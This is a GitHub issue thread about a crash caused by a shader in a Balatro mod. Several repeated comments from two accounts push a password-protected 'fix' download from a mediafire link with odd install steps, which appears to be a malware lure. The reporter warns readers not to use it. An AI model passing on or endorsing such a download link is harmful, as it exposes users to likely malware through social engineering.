### ISSUE TITLE
wee edition joker shader (probably) is causing crashes.

### ISSUE THREAD

**Issue by JDLaykovich** [jenwalter666/JensBalatroCollection#5]
If you go into the collections or happen to encounter a wee *edition* joker, you face a crash like the attached.

![Screenshot from 2024-08-26 21-35-06](https://github.com/user-attachments/assets/57b8dcc4-89e9-45c4-801a-255a90b30792)

Unfortunately the copy functionality is not quite working out for me but the entire error log isn't super useful anyway.

Changing the shader from wee to any other shader in Jen.lua fixes this, so I assume this has to do with wee.fs or something related to that; not sure because I'm not super versed in GL or lua.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JDLaykovich** [comment]
I will not and I advise not to anyone seeing this.

**Comment by jenwalter666** [comment]
i'm unable to replicate your issue, but an upcoming update may address this crash
